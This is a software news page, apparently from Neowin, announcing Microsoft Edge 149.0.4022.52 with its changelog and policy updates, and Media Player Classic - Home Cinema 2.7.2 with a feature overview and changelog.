    • Microsoft Edge 149.0.4022.52 by Razvan Serea Microsoft Edge is a super fast and secure web browser from Microsoft. It works on almost any device, including PCs, iPhones and Androids. It keeps you safe online, protects your privacy, and lets you browse the web quickly. You can even use it on all your devices and keep your browsing history and favorites synced up. Built on the same technology as Chrome, Microsoft Edge has additional built-in features like Startup boost and Sleeping tabs, which boost your browsing experience with world class performance and speed that are optimized to work best with Windows. Microsoft Edge security and privacy features such as Microsoft Defender SmartScreen, Password Monitor, InPrivate search, and Kids Mode help keep you and your loved ones protected and secure online. Microsoft Edge has features to keep both you and your family protected. Enable content filters and access activity reports with your Microsoft Family Safety account and experience a kid-friendly web with Kids Mode. The new Microsoft Edge is now compatible with your favorite extensions, so it’s easy to personalize your browsing experience. Microsoft Edge 149.0.4022.52 changelog: Migration to improved V2 architecture for Workspaces. Workspaces, introduced in Edge in 2022, allows users to create durable sets of tabs that can be saved and shared with others. In order to improve reliability and performance of this feature, the following changes are being made: Migrating data for saved Workspaces from OneDrive/SharePoint to Edge Sync service Removing the collaboration/share functionality of this feature For organizations who have disabled Sync through policy, the existing v1 Workspace data will still be migrated to the new architecture. New v2 Workspaces created after migration won't sync across devices and will remain local to each device. This update occurs on a progressive rollout beginning in Edge Stable v145 and will continue rolling out in Edge v149. For more information, see Getting started with Microsoft Edge Workspaces. Feature Updates Passkey Sync for Enterprise Users. Microsoft Edge is introducing support for passkey synchronization for enterprise users, enabling secure, passwordless authentication across devices. Passkeys created in Edge can now be synced seamlessly, improving sign-in experience while maintaining strong security standards. Note: This is a controlled feature rollout. If you don't see this change, check back as we continue the rollout. Enterprise WebView2 runtime downgrade via DowngradeVersion policy. Administrators can temporarily roll back specific applications to a previous WebView2 Evergreen Runtime version (N-1 or N-2) using the new DowngradeVersion policy in msedgewebview2.admx. The Downgrade Version policy allows enterprises to mitigate critical regressions by specifying per-application exe-to-version mappings. The Edge Updater installs the target version side-by-side, and the WebView2 Loader redirects targeted apps accordingly. Downgrades auto-expire with each new WebView2 release: apps pinned to N-1 remain on the same version (now becoming N-2) and will auto-update in the next release, while apps pinned to N-2 will revert to the current Evergreen version. The policy applies only to enterprise-managed devices (domain-joined or MDM-enrolled). For more information, see Microsoft Edge WebView2 Policy Documentation | Microsoft Learn. Collections retirement. Collections has been removed in this update. Users can no longer access or use the feature. To keep saved content, users can export it, or move all pages to Favorites before updating to Microsoft Edge Stable 149. For more information, see Organize your ideas with Collections in Microsoft Edge - Microsoft Support. Modern, unified, and updated Look and Feel. Microsoft Edge has updated the Look and Feel to give customers a unified experience across all of Microsoft AI surfaces including Copilot and Bing. This changes multiple elements of the UX such as spacing, corners, fonts, default colors, etc. Clarify choices surrounding third-party cookie settings. Language under Settings > Privacy, search, and services > Cookies are clarified to better describe the choices users have in managing third-party cookies. Custom primary password retirement. Users are no longer able to create a new custom primary password in Edge Settings edge://settings/autofill/passwords/settings. Any users who are still using a custom primary password will be automatically migrated to device authentication. Additionally, the PrimaryPasswordSetting policy will no longer support the WithCustomPrimaryPassword option. For more information, see Keep your saved passwords private in Microsoft Edge | Microsoft Support. Unifying Copilot Chat policy controls. The Microsoft365CopilotChatIconEnabled policy is the standard for configuring Copilot Chat. Previously, this behavior was controlled by blocking the Copilot extension, either explicitly or by using the * wildcard via the ExtensionSettings or ExtensionInstallBlockList policies. Extension and sidebar policies no longer affect the appearance or functionality of Copilot Chat. Copilot address bar suggestions were also tied to extension policy settings. Starting in Microsoft Edge version 149, admins can use the CopilotAddressBarSuggestionsEnabled policy to manage this behavior. Intune MAM Protected Downloads. The protected downloads feature for Intune MAM is now available for BYOD (Bring Your Own Device) devices, which aren't managed by a tenant. Policy Updates / New policies CopilotAddressBarSuggestionsEnabled - Enable Copilot address bar suggestions CpuPerformanceTierOverride - Override for the CPU performance tier DataUrlInWebWorkerOpaqueOriginEnabled - Enable opaque origins for data URLs in Web Workers DefaultLocalFontsSetting - Default Local Fonts permission setting ForceForegroundPriorityForUrls - Force foreground priority for specific URLs LocalFontsAllowedForUrls - Allow Local Fonts permission on these sites LocalFontsBlockedForUrls - Block Local Fonts permission on these sites Deprecated policies WalletDonationEnabled - Wallet Donation Enabled (deprecated) EdgeWalletEtreeEnabled - Edge Wallet E-Tree Enabled (deprecated) Additional policy changes ForceForegroundPriorityForUrls - ForceForegroundPriorityForOrigins is renamed to ForceForegroundPriorityForUrls OnSecurityEventEnterpriseConnector - Add macOS platform support ProtectedContentIdentifiersAllowed - Remove macOS platform support Download: Microsoft Edge (64-bit) | 193.0 MB (Freeware) Download: Microsoft Edge (32-bit) | 170.0 MB Download: Microsoft Edge (ARM64) | 188.0 MB View: Microsoft Edge Website | Release History Get alerted to all of our Software updates on Twitter at @NeowinSoftware
    • User: "But is it good?" Microsoft: "Well, no. But it is less bad."
    • Media Player Classic - Home Cinema 2.7.2 by Razvan Serea Media Player Classic - Home Cinema (MPC-HC) is a free and open-source video and audio player for Windows. MPC-HC is based on the original Guliverkli project (which is no longer maintained) and contains many additional features and bug fixes. As the continuation of the original Media Player Classic, MPC-HC isn’t flashy but it works with nearly any media format. MPC-HC uses DXVA technology to pass decoding operations to your modern video card, enhancing your viewing experience. And MPC-HC supports both physical and software DVDs with menus, chapter navigation, and subtitles. Overview of features A lot of people seem to be unaware of some of the awesome features that have been added to MPC-HC in the past years. Here is a list of useful options and features that everyone should know about: Dark interface Menu > View > Dark Theme When using dark theme it is also possible to change the height of the seekbar and size of the toolbar buttons. Options > Advanced Video preview on the seekbar Options > Tweaks > Show preview on seek bar Adjust playback speed Menu > Play > Playback rate The buttons in the player that control playback rate take a 2x step by default. This can be customized to smaller values (like 10%): Options > Playback > Speed step Adjusting playback speed works best with the internal audio renderer. This also has automatic pitch correction. Options > Playback > Output > Audio Renderer MPC-HC can remember playback position, so you can resume from that point later Options > Player > History You can quickly seek through a video with Ctrl + Mouse Scrollwheel. You can jump to next/previous file in a folder by pressing PageUp/PageDown. You can perform automatic actions at end of file. For example to go to next file or close player. Options > Playback > After Playback (permanent setting) Menu > Play > After Playback (for current file only) A-B repeat - You can loop a segment of a video. Press [ and ] to set start and stop markers. You can rotate/flip/mirror/stretch/zoom the video Menu > View > Pan&Scan This is also easily done with hotkeys (see below). There are lots of keyboard hotkeys and mouse actions to control the player. They can be customized as well. Options > Player > Keys Tip: there is a search box above the table. You can stream videos directly from Youtube and many other video websites You can stream videos directly from Youtube and many other video websites Put yt-dlp.exe or youtube-dl.exe in the MPC-HC installation folder. Then you can open website URLs in the player: Menu > File > Open File/URL You can even download those videos: Menu > File > Save a copy Tip: to be able to download in best quality with yt-dlp/youtube-dl, it is recommended to also put ffmpeg.exe in the MPC-HC folder. Several YDL configuration options are found here: Options > Advanced This includes an option to specify the location of the .exe in case you don't want to put it in MPC-HC folder. Play HDR video This requires using madVR or MPC Video Renderer. After installation these renderers can be selected here: Options > Playback > Output Ability to search for and download subtitles, either automatically or manually (press D): Options > Subtitles > Misc Besides all these (new) features, there have also been many bugfixes and internal improvements in the player in the past years that give better performance and stability. It also has updated internal codecs. Support was added for CUE sheets, WebVTT subtitles, etc. Media Player Classic - Home Cinema 2.7.2 changelog: Updated LAV Filters to version 0.81-23-g6fadb Updated MPC Video Renderer to version 0.10.2.2540 Updated MediaInfo DLL to version 26.05 Updated MPC Audio Renderer Several crash fixes, bug fixes and small improvements. Download: MPC-HC 2.7.2 (x64) | Standalone | ~20.0 MB (Open Source) Download: MPC-HC 2.7.2 (x86) | Standalone Links: MPC-HC Home Page | Screenshot Get alerted to all of our Software updates on Twitter at @NeowinSoftware
  • Recent Achievements

    • Very Popular
      s0nic69 earned a badge
      Very Popular
    • Collaborator
      Asgardi earned a badge
      Collaborator
    • Conversation Starter
      mobandz earned a badge
      Conversation Starter
    • Apprentice
      fernan99 went up a rank
      Apprentice
    • One Month Later
      nothanks earned a badge
      One Month Later
  • Popular Contributors

    1. 1
      +primortal
      471
    2. 2
      PsYcHoKiLLa
      247
    3. 3
      Skyfrog
      80
    4. 4
      FloatingFatMan
      67
    5. 5
      Michael Scrip
      60
  • Tell a friend

    Love Neowin? Tell a friend!